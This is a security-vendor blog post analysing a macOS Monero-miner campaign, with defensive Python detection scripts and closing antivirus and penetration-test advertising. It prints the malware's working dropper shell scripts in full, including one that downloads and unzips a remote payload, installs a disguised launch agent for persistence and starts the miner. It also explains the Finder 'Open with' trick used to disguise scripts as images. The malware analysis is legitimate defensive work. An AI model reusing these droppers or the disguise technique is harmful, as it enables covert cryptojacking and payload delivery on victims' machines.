A hack of the MacUpdate website was used to distribute a new Mac crypto miner. After a more thorough analysis, our cybersecurity team found that this attack was only the tip of the iceberg: the new variant is the culmination of a campaign that has been running since October of last year, and the same malware exists in 23 other variants.
The oldest variant is niceass.zip. Unpacking it yields two files: an image file called ass.jpg and a broken application named temp.app.
temp.app does not run, but its contents are intriguing: another ass.jpg image, a file named com.zerowidth.launched.apple.plist (a launch agent .plist), an executable named Dock, which borrows the name of the Apple process that manages the Dock, and a Frameworks folder containing external framework code that the Dock executable presumably needs.
The file ass.jpg is not actually a JPEG file; it is a shell script:
nohup mv ~/Downloads/niceass/temp.app ~/Downloads/niceass/.tmp
mv ~/Downloads/niceass/.tmp/Apple ~/Library &&
mkdir -p ~/Library/LaunchAgents &&
mv ~/Library/Apple/com.zerowidth.launched.apple.plist ~/Library/LaunchAgents &&
launchctl load -w ~/Library/LaunchAgents/com.zerowidth.launched.apple.plist &&
rm -rf ~/Downloads/niceass/.tmp &&
rm ~/Downloads/niceass/ass.jpg &&
mv ~/Library/Apple/ass.jpg ~/Downloads/niceass &&
open -a Preview ~/Downloads/niceass/ass.jpg &&
~/Library/Apple/Dock -user [email protected]@gmail.com -xmr &
The script runs from within the niceass folder. Its first step is to rename temp.app to .tmp; the leading dot hides the folder in Finder and makes the app less conspicuous. The second step moves the components out of the niceass folder into their final locations: the Apple folder goes to ~/Library, and the launch agent .plist is installed in ~/Library/LaunchAgents and loaded with launchctl load -w, so the miner is started again at every login. The third step deletes the ass.jpg script, replaces it with the real ass.jpg image from inside the Apple folder and opens that image in Preview, so the user sees the picture they expected. The final step launches the malicious Dock process, passing an email address as the username to log in to MinerGate; the process then uses as much CPU time as it can to mine the Monero cryptocurrency (the -xmr flag).
The way ass.jpg gets executed is clever: the file carries an honest-to-goodness .jpg extension, but macOS lets a user override which application opens a particular file from the Finder's Get Info window (the "Open with" setting). Here the override points at Terminal, so double-clicking what looks like an image runs the file as a shell script.
The override is not stored in the file's contents but in an extended attribute, com.apple.LaunchServices.OpenWith, attached to the file. When the file is zipped on a Mac, Archive Utility stores that attribute in a __MACOSX/._ass.jpg sidecar entry added to the archive, and the attribute is reconstructed when the zip is expanded on another Mac. The attribute can be inspected with xattr -l ass.jpg, which for this sample prints a binary property list (bplist00) whose path entry is /Applications/Utilities/Terminal.app and whose bundle identifier is com.apple.Terminal:
00000000 62 70 6C 69 73 74 30 30 D3 01 02 03 04 05 06 57 |bplist00.......W|
00000010 76 65 72 73 69 6F 6E 54 70 61 74 68 5F 10 10 62 |versionTpath_..b|
00000020 75 6E 64 6C 65 69 64 65 6E 74 69 66 69 65 72 10 |undleidentifier.|
00000030 00 5F 10 24 2F 41 70 70 6C 69 63 61 74 69 6F 6E |._.$/Application|
00000040 73 2F 55 74 69 6C 69 74 69 65 73 2F 54 65 72 6D |s/Utilities/Term|
00000050 69 6E 61 6C 2E 61 70 70 5F 10 12 63 6F 6D 2E 61 |inal.app_..com.a|
00000060 70 70 6C 65 2E 54 65 72 6D 69 6E 61 6C 08 0F 17 |pple.Terminal...|
00000070 1C 2F 31 58 00 00 00 00 00 00 01 01 00 00 00 00 |./1X............|
00000080 00 00 00 07 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000090 00 00 00 6D |...m|
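As an added example (not code from the original page, nor from the malware), the following Python decodes that xattr -l dump back into the property list and applies the obvious triage check: an image-named file whose Open-with handler is a terminal is a disguised script. It also lists the entries of a Mac-made zip that carry a __MACOSX/._ sidecar, i.e. whose extended attributes will be restored on extraction. The attribute name com.apple.LaunchServices.OpenWith and the sidecar naming are how macOS actually behaves; the list of terminal handlers and the stand-in zip contents are this example's own assumptions.

```python
"""Decode the Finder "Open with" override stored in the
com.apple.LaunchServices.OpenWith extended attribute and spot image files
that have been wired to open in Terminal, the trick ass.jpg relies on."""
import io
import plistlib
import re
import zipfile

# `xattr -l` output for ass.jpg as shown on this page (transcribed). xattr -l
# also prints the attribute name on its own line first; the parser skips
# anything that is not a hex-dump row and ignores the ASCII column.
ASS_JPG_XATTR_DUMP = """
00000000 62 70 6C 69 73 74 30 30 D3 01 02 03 04 05 06 57 |bplist00.......W|
00000010 76 65 72 73 69 6F 6E 54 70 61 74 68 5F 10 10 62 |versionTpath_..b|
00000020 75 6E 64 6C 65 69 64 65 6E 74 69 66 69 65 72 10 |undleidentifier.|
00000030 00 5F 10 24 2F 41 70 70 6C 69 63 61 74 69 6F 6E |._.$/Application|
00000040 73 2F 55 74 69 6C 69 74 69 65 73 2F 54 65 72 6D |s/Utilities/Term|
00000050 69 6E 61 6C 2E 61 70 70 5F 10 12 63 6F 6D 2E 61 |inal.app_..com.a|
00000060 70 70 6C 65 2E 54 65 72 6D 69 6E 61 6C 08 0F 17 |pple.Terminal...|
00000070 1C 2F 31 58 00 00 00 00 00 00 01 01 00 00 00 00 |./1X............|
00000080 00 00 00 07 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000090 00 00 00 6D |...m|
"""

# Handlers that make no sense for a picture (assumed list for this example).
SCRIPT_RUNNERS = {"com.apple.Terminal", "com.googlecode.iterm2"}
IMAGE_SUFFIXES = (".jpg", ".jpeg", ".png", ".gif")

# One hex-dump row: 8-digit offset, hex byte pairs, then the |ascii| column.
HEX_ROW = re.compile(r"^\s*[0-9A-Fa-f]{8}\s+((?:[0-9A-Fa-f]{2}\s+)+)\|")


def parse_xattr_dump(dump: str) -> bytes:
    """Turn `xattr -l` hex rows back into the raw attribute bytes."""
    out = bytearray()
    for line in dump.splitlines():
        m = HEX_ROW.match(line)
        if m:
            out.extend(bytes.fromhex(m.group(1)))  # fromhex skips whitespace
    return bytes(out)


def decode_open_with(raw: bytes) -> dict:
    """Parse the binary plist; Launch Services stores version, path and bundle id."""
    plist = plistlib.loads(raw)  # autodetects the bplist00 format
    return {"version": plist.get("version"),
            "path": plist.get("path"),
            "bundleidentifier": plist.get("bundleidentifier")}


def is_disguised_script(filename: str, raw_open_with) -> bool:
    """True when an image-named file is set to open in a terminal application."""
    if not raw_open_with or not filename.lower().endswith(IMAGE_SUFFIXES):
        return False
    return decode_open_with(raw_open_with)["bundleidentifier"] in SCRIPT_RUNNERS


def files_with_macosx_sidecars(zip_bytes: bytes) -> list:
    """Entries whose __MACOSX/._<name> sidecar (AppleDouble file holding the
    extended attributes) is present, so an Open-with override would survive."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = set(zf.namelist())
    carriers = []
    for n in sorted(names):
        if n.startswith("__MACOSX/") or n.endswith("/"):
            continue
        parent, _, base = n.rpartition("/")
        sidecar = "__MACOSX/" + (parent + "/" if parent else "") + "._" + base
        if sidecar in names:
            carriers.append(n)
    return carriers


def build_sample_zip() -> bytes:
    """Constructed stand-in for niceass.zip: a 'jpg' that is really a script,
    its AppleDouble sidecar (magic 00 05 16 07 only), and an app bundle file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("niceass/ass.jpg", "#!/bin/sh\necho 'script disguised as image'\n")
        zf.writestr("__MACOSX/niceass/._ass.jpg", b"\x00\x05\x16\x07")
        zf.writestr("niceass/temp.app/Contents/Info.plist", "<plist/>")
    return buf.getvalue()


if __name__ == "__main__":
    raw = parse_xattr_dump(ASS_JPG_XATTR_DUMP)
    print(decode_open_with(raw))
    print("ass.jpg is a disguised script:", is_disguised_script("ass.jpg", raw))
    print("zip entries carrying xattr sidecars:", files_with_macosx_sidecars(build_sample_zip()))
```

On a real Mac the raw attribute comes from xattr -l on the extracted file; feeding that output to parse_xattr_dump is all that is needed. The sidecar check is a cheap pre-extraction warning, not a verdict: many legitimate Mac-made archives carry __MACOSX entries, so the decisive test is the decoded bundle identifier.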
This is not highly sophisticated malware, but keep in mind that it is the least sophisticated of the set, and there are 22 more capable variants of it.
The next one is serial.zip. It works similarly, but the suspicious temp.app was renamed .temp.app so that the leading dot hides it from the user's view. This variant also replaces the crude ass.jpg photo with a text file containing a serial number.
The next variant is a JPEG file distributed through WhatsApp under the name WhatsApp Image 2017-12-23 at 13.31.15.jpeg. It does not ship temp.app. Instead, its script deletes itself, downloads a decoy image from www.askideas.com under the same file name and opens it in Preview, then downloads the real payload (1.zip) from public.adobecc.com, unzips it into ~/Library and installs and loads a launch agent named GoogleSoftwareUpdateAgent.plist, a name chosen to resemble Google's legitimate updater. This variant uses the following script:
nohup rm -rf ~/Downloads/WhatsApp\ Image\ 2017-12-23\ at\ 13.31.15.jpeg &&
curl -o ~/Downloads/WhatsApp\ Image\ 2017-12-23\ at\ 13.31.15.jpeg https://www.askideas.com/media/38/I-Killed-Black-Snake-Why-U-Not-Happy-Funny-Pet-Meme-Image-For-Whatsapp.jpg &&
open -a Preview ~/Downloads/WhatsApp\ Image\ 2017-12-23\ at\ 13.31.15.jpeg &&
curl -o ~/Library/1.zip https://public.adobecc.com/files/1UFRTMCE4GD4DBFSPQVFGD2FYYVFFF?content_disposition=attachment &&
cd ~/Library &&
unzip ~/Library/1.zip &&
rm -rf ~/Library/1.zip &&
mkdir -p ~/Library/LaunchAgents &&
mv ~/Library/GoogleSoftwareUpdateAgent.plist ~/Library/LaunchAgents &&
launchctl load -w ~/Library/LaunchAgents/GoogleSoftwareUpdateAgent.plist &
This variant still relies on the MacOSupdate.plist and MacOS.plist launch agents. The other 19 variants are similar to the WhatsApp variant.
The final variant is a single file named link-to-download.txt, which shares traits with both the WhatsApp variant and the serial/niceass variants.
We strongly recommend installing an antivirus for Mac to protect against this type of malware, which can turn a Mac into a crypto miner in under a second.
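Both droppers above persist the same way: a .plist is moved into ~/Library/LaunchAgents and activated with launchctl load -w, so the miner comes back at every login. The Python below is an added example, not code from this page or from the malware, that audits a LaunchAgents directory for that pattern: agent file names this page reports, a program binary outside the system and application directories (such as ~/Library/Apple/Dock), and MinerGate-style arguments (-user <email> -xmr). The sample plist contents (program path, email address, RunAtLoad) are constructed, since the page does not show the real plists, and the trusted-directory list is a heuristic of this example.

```python
"""Triage ~/Library/LaunchAgents for the persistence pattern used by the
droppers on this page: a per-user launch agent whose binary sits in a
user-writable location and whose command line is a MinerGate login
(-user <email> -xmr), or whose file name matches an agent these variants drop."""
import plistlib
import tempfile
from pathlib import Path

# Launch agent file names named on this page.
KNOWN_DROPPED_AGENTS = {
    "com.zerowidth.launched.apple.plist",
    "GoogleSoftwareUpdateAgent.plist",
    "MacOSupdate.plist",
    "MacOS.plist",
}
# Substrings that betray a MinerGate-style miner command line (the Dock
# binary is started with "-user <email> -xmr").
MINER_TOKENS = ("-xmr", "-user", "minergate")
# Where a legitimate agent's binary normally lives (heuristic for this
# example); anything else, e.g. ~/Library/Apple/Dock, deserves a look.
TRUSTED_PREFIXES = ("/System/", "/usr/", "/Applications/", "/Library/")


def program_path(plist: dict) -> str:
    """launchd runs Program if set, otherwise ProgramArguments[0]."""
    if plist.get("Program"):
        return str(plist["Program"])
    args = plist.get("ProgramArguments") or []
    return str(args[0]) if args else ""


def audit_agent(path: Path) -> list:
    """Reasons this launch agent looks suspicious; an empty list means nothing found."""
    reasons = []
    if path.name in KNOWN_DROPPED_AGENTS:
        reasons.append(f"file name {path.name} matches an agent dropped by this campaign")
    try:
        with path.open("rb") as fh:
            plist = plistlib.load(fh)
    except Exception as exc:  # not a plist, or deliberately malformed
        return reasons + [f"could not parse plist: {exc}"]
    prog = program_path(plist)
    if prog and not prog.startswith(TRUSTED_PREFIXES):
        reasons.append(f"program {prog} lives outside system and application directories")
    args = [str(a).lower() for a in plist.get("ProgramArguments") or []]
    hits = sorted(t for t in MINER_TOKENS if any(t in a for a in args))
    if hits:
        reasons.append("miner-style arguments: " + " ".join(hits))
    return reasons


def audit_launch_agents(directory) -> dict:
    """Map every suspicious *.plist in `directory` to its list of reasons."""
    findings = {}
    for p in sorted(Path(directory).glob("*.plist")):
        reasons = audit_agent(p)
        if reasons:
            findings[p.name] = reasons
    return findings


def build_sample_agents(directory) -> None:
    """Write two constructed plists: one mimicking the niceass agent (the page
    does not show its contents, so these values are assumed) and one benign."""
    directory = Path(directory)
    with (directory / "com.zerowidth.launched.apple.plist").open("wb") as fh:
        plistlib.dump({
            "Label": "com.zerowidth.launched.apple",
            "ProgramArguments": ["/Users/victim/Library/Apple/Dock",
                                 "-user", "victim@example.com", "-xmr"],
            "RunAtLoad": True,
        }, fh)
    with (directory / "com.example.benign.plist").open("wb") as fh:
        plistlib.dump({
            "Label": "com.example.benign",
            "ProgramArguments": ["/usr/bin/true"],
            "RunAtLoad": True,
        }, fh)


def demo() -> dict:
    """Run the audit against the constructed samples in a scratch directory."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_agents(tmp)
        return audit_launch_agents(tmp)


if __name__ == "__main__":
    # On a real Mac: audit_launch_agents(Path.home() / "Library/LaunchAgents")
    for name, reasons in demo().items():
        print(name)
        for r in reasons:
            print("  -", r)
```

The location heuristic will also flag legitimate agents that ship their binary under ~/Library/Application Support, so treat a single reason as a prompt to look, and the combination of an odd location with miner arguments as the actual indicator.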
Identified Dropped files:
Regular users are the most affected by malware these days, because most of them pay little attention to what antivirus they have installed on their systems.
Users can download the antivirus developed by our company directly by clicking the download banner at the end of the page.
Our free antivirus download helps users protect their Mac or Windows devices against malware and adware.
We offer a free one-day antivirus license to all users who want to test the full power of our antivirus solution.
Our antivirus detects a broad spectrum of threats, from dangerous malware to rogue browser extensions used to mine cryptocurrency.
The antivirus our company offers is an OPSWAT-certified product.
Most companies don't care about cybersecurity until they suffer a breach.
A healthy company should perform penetration tests periodically. The test should cover all of the company's assets, including its employees, who are the most vulnerable to social engineering attacks.
A penetration test can be performed either by an in-house security specialist or by hiring an external cybersecurity company to take care of everything.
Besides penetration testing, a company should have at least a baseline of security controls in place, such as antivirus and a firewall.
CyberByte can perform penetration tests across the full spectrum, from PCI DSS compliance testing to red teaming, perimeter testing and social engineering.
We also provide employee profiling and cyber threat monitoring services, since most of today's data breaches originate inside the company.
To see our penetration testing services, go to the Services tab in the main menu.
Windows users can download the free CyberByte antivirus solution by clicking the banner. The free antivirus will tell you whether your PC is infected. CyberByte's free Windows antivirus is award-winning software for malware detection.
Mac / macOS / OS X users can download the free CyberByte antivirus for Mac by clicking the banner. The free antivirus will tell you whether your Mac is infected. CyberByte's free macOS / OS X antivirus is award-winning software for malware detection and is available for current macOS and older OS X versions.
Features of CyberByte™ antivirus:
- Protects you from all kinds of threats
- CyberByte™ custom detection engine includes Mac and Windows malware protection and detection
- Fastest scanning times in the market
- Crypto Mining rogue extensions/malware detection
- Ransomware detection - don't negotiate with ransomware cyber terrorists; keep your Mac and Windows machines safe
- Active live protection in the background
- Certified Threat Detector by OPSWAT
- Easy to Install
- Easy to Manage
- Incredible value for money
Invisible, protecting you from behind the scenes - you will not notice it is installed on your computer; it is easy on resources, as protection software should be.
Original technology that combines behavioural heuristic analysis with a powerful signature database - the CyberByte™ Protection Engine delivers top-of-the-line protection in an instant.
Fastest scanning times on the market - your time is precious, but so is your digital life; CyberByte™ delivers fast scanning, saving both time and your valuable data.
Don't negotiate with ransomware cyber terrorists - keep your Mac safe and never end up paying for what is already yours.
Protect others as well - the CyberByte™ Protection Engine not only detects a threat but stops it from spreading to other Macs or Windows machines.
Don't let strangers use your resources - more than 80% of attacks are crypto-mining driven. Are you sure your computer is not mining crypto while you read this text?
Our malware protection will continuously look after your device, providing the best security against viruses. Give us the chance to prove it by downloading the antivirus for your device.
CyberByte Antivirus is a certified product by OPSWAT (OPSWAT is a San Francisco-based software company that provides solutions to secure and manage IT infrastructure. Founded in 2002, OPSWAT delivers solutions that provide manageability of endpoints and networks, and that help organizations protect against zero-day attacks by using multiple antivirus engine scanning and document sanitization. To learn more about OPSWAT's innovative and unique solutions, please visit http://www.opswat.com).
CyberByte Antivirus comes in two flavors:
MacOS Version - the free download Mac antivirus available on our website (https://mac.cyberbyte.org)
Windows Version - the free download Windows antivirus available on our website (https://pc.cyberbyte.org)
The procedure is simple:
Download the free antivirus from the CyberByte website, for either Mac or Windows.
Install it using the antivirus installer package.
Run the free malware scan on your device; the scan duration depends on how many files are on it.
CyberByte antivirus will report any infected files when the scan finishes.